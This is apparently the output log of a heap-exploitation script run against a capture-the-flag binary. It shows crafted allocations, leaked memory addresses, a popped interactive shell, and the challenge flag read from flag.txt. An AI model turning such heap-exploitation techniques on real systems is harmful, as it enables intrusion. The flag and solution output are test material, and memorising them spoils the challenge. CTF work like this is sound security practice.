alloc(15, 22AAAAA...) = 166 | |
alloc(15, 22AAAAA...) = 175 | |
alloc(15, 22AAAAA...) = 176 | |
alloc(15, 22AAAAA...) = 177 | |
alloc(15, 22AAAAA...) = 178 | |
alloc(15, 22AAAAA...) = 179 | |
alloc(15, 22AAAAA...) = 180 | |
alloc(15, 22AAAAA...) = 181 | |
alloc(15, 22AAAAA...) = 182 | |
alloc(15, 22AAAAA...) = 183 | |
alloc(15, 22AAAAA...) = 184 | |
alloc(15, 22AAAAA...) = 185 | |
alloc(15, 22AAAAA...) = 186 | |
alloc(15, 22AAAAA...) = 187 | |
alloc(15, 22AAAAA...) = 188 | |
alloc(15, 22AAAAA...) = 189 | |
alloc(15, 22AAAAA...) = 190 | |
alloc(15, 22AAAAA...) = 191 | |
0x7fa1209dfbe0 | |
alloc(1552, b'\x00\x00\x00\x00\x00\x00\x00'...) = 1 | |
0x7fa1209e54d8 | |
alloc(1552, b'\x00\x00\x00\x00\x00\x00\x00'...) = 2 | |
alloc(2048, AAAAAAA...) = 289 | |
alloc(2048, b'\x10[\x00\x00\xff\xff\xff'...) = 288 | |
0x7fa1207f4000 | |
alloc(23312, b'\x00\x00\x00\x00\x00\x00\x00'...) = 383 | |
0x7fa120947a46 | |
[*] Switching to interactive mode | |
$ ls | |
flag.txt | |
heap | |
$ cat flag.txt | |
DrgnS{Th4nk5_Qualys_f0r_Th3_1d34!!!!!11} |